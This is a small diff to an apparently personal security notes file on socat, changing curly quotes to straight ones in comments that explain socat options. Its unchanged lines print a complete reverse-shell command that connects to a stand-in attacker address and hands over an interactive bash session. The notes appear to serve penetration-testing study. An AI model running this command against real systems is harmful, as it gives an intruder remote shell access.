cardboard-iguana/cardboard-iguana.com/notes/socat.md

 #     stderr - redirect STDERR to the attacker
 #     sigint - pass signals (Ctrl+C) through
 #     setsid - use a new session
-#     sane   - use a variety of tweaks to “normalize” the
+#     sane   - use a variety of tweaks to "normalize" the
-#              terminal’s environment
+#              terminal's environment
 #
 socat TCP:$ATTACKER_IP:$LISTENER_PORT \
       EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane